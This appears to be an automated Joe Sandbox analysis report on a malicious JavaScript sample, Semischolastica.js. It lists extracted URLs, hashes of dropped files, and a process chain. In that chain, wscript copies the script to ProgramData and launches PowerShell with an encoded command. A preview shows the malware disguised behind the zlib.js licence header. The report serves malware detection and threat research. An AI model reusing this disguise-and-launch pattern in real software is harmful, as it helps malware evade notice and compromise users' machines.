https://github.com/imaya/zlib.js | wscript.exe, 00000000.00000003.576624721.000001CC97AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.576968524.000001CC99F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.579865423.000001CC99B10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.579593243.000001CC99A00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.592556553.0000017FB91B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.592773841.0000017FB92B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.590632857.0000017FB96B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.582806752.0000017FB72FD000.00000004.00000020.00020000.00000000.sdmp, Semischolastica.js, WeigelasScribbleable.js.0.dr | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.942982234.0000021D64FA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000003.00000002.942982234.0000021D66B29000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.962884479.0000021D75007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              No contacted IP infos
              Joe Sandbox Version:37.1.0 Beryl
              Analysis ID:876155
              Start date and time:2023-05-26 11:25:36 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 7m 56s
              Hypervisor based Inspection enabled:false
              Report type:light
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:Semischolastica.js
              Detection:MAL
              Classification:mal92.evad.winJS@6/6@0/0
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .js
              • Override analysis time to 240s for JS files taking high CPU consumption
              • Stop behavior analysis, all processes terminated
              • Exclude process from analysis (whitelisted): WMIADAP.exe
              • Execution Graph export aborted for target powershell.exe, PID 6908 because it is empty
• Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
11:27:24 | API Interceptor | 30x Sleep call for process: powershell.exe modified
              No context
              No context
              No context
              No context
              No context
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with very long lines (47992), with CRLF line terminators
              Category:dropped
              Size (bytes):320228
              Entropy (8bit):4.640366993339328
              Encrypted:false
              SSDEEP:6144:ZFfjJ+xra8vNL0KrsrFLH3XcHso+wZjWCMoowzZa0hmGbmgLMa:Z5jJgl+R3XcMmjDn
              MD5:476FAD0A9B9F0B665B416BEB78B55CFF
              SHA1:C5631292A9E8C5887E3674C819CD3EE4AAB786DD
              SHA-256:AA18039B1459C1054B2EAD589186D0C3E1E02CDFEBF5F4642E1B5CC13AF8C104
              SHA-512:4286465C493953F5AB7805777D85A9C5F59F902B732438EC3C2BBB4D20E0A3C6066963E7F2FB458C9D4E80458F1463A0FE5C3AC79583EDD00704AAFB6086370C
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              Reputation:low
              Preview:/**..* @license..* zlib.js..* JavaScript Zlib Library..* https://github.com/imaya/zlib.js..*..* The MIT License..*..* Copyright (c) 2012 imaya..*..* Permission is hereby granted, free of charge, to any person obtaining a copy..* of this software and associated documentation files (the "Software"), to deal..* in the Software without restriction, including without limitation the rights..* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell..* copies of the Software, and to permit persons to whom the Software is..* furnished to do so, subject to the following conditions:..*..* The above copyright notice and this permission notice shall be included in..* all copies or substantial portions of the Software...*..* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR..* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,..* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE..* AUTHORS OR COPYRIGHT HOLDERS
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Reputation:high, very likely benign file
              Preview:[ZoneTransfer]....ZoneId=0
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):9432
              Entropy (8bit):4.918232018284106
              Encrypted:false
              SSDEEP:192:Nxoe5FpOMxoe5Pib4GVsm5emdygkjDt4iWN3yBGHh9smidcU6CGdcU6CS9smDpOh:bfib4Glkjh4iUxs14fib41
              MD5:F6775EDC5EE3B8EEDBF8310BD48C709D
              SHA1:51DBC51183BFBFE57F24E9AD63840E60D2E64842
              SHA-256:B5D6E4B1EF4F3E734E47F87E8226814AE7D574F4E458CCE4E21D637588F45B28
              SHA-512:EDCED69415369C7EBA17D72EC1691FE44F5C5DCF7565EAE1A22112E631FFBBCE72B830BBF0D91E70484BC7F0E4D59870777B07E86126438E78E15A7337D97BD6
              Malicious:false
              Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):64
              Entropy (8bit):0.9260988789684415
              Encrypted:false
              SSDEEP:3:Nlllulb/lj:NllUb/l
              MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
              SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
              SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
              SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
              Malicious:false
              Preview:@...e................................................@..........
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview:1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview:1
              File type:ASCII text, with very long lines (47992), with CRLF line terminators
              Entropy (8bit):4.640366993339328
              TrID:
              • Digital Micrograph Script (4001/1) 100.00%
              File name:Semischolastica.js
              File size:320228
              MD5:476fad0a9b9f0b665b416beb78b55cff
              SHA1:c5631292a9e8c5887e3674c819cd3ee4aab786dd
              SHA256:aa18039b1459c1054b2ead589186d0c3e1e02cdfebf5f4642e1b5cc13af8c104
              SHA512:4286465c493953f5ab7805777d85a9c5f59f902b732438ec3c2bbb4d20e0a3c6066963e7f2fb458c9d4e80458f1463a0fe5c3ac79583edd00704aafb6086370c
              SSDEEP:6144:ZFfjJ+xra8vNL0KrsrFLH3XcHso+wZjWCMoowzZa0hmGbmgLMa:Z5jJgl+R3XcMmjDn
              TLSH:3E649680471518A24B4B7F36A730A4A5EBBE0EB9C2D4598BF46F7250FBDF94CC8D1621
              File Content Preview:/**..* @license..* zlib.js..* JavaScript Zlib Library..* https://github.com/imaya/zlib.js..*..* The MIT License..*..* Copyright (c) 2012 imaya..*..* Permission is hereby granted, free of charge, to any person obtaining a copy..* of this software and assoc
              Icon Hash:68d69b8bb6aa9a86
              No network behavior found

              Target ID:0
              Start time:11:26:30
              Start date:26/05/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Semischolastica.js"
              Imagebase:0x7ff624190000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:2
              Start time:11:27:19
              Start date:26/05/2023
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\wscript.exe" "C:\ProgramData\WeigelasScribbleable.js" ProtopathicCosmographically pachisisCounterproductiveness KnowingestGemmer theoreticianRoundishness
              Imagebase:0x7ff624190000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:3
              Start time:11:27:21
              Start date:26/05/2023
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "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
              Imagebase:0x7ff7466a0000
              File size:447488 bytes
              MD5 hash:95000560239032BC68B4C2FDFCDEF913
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Reputation:high

              Target ID:4
              Start time:11:27:21
              Start date:26/05/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6da640000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              No disassembly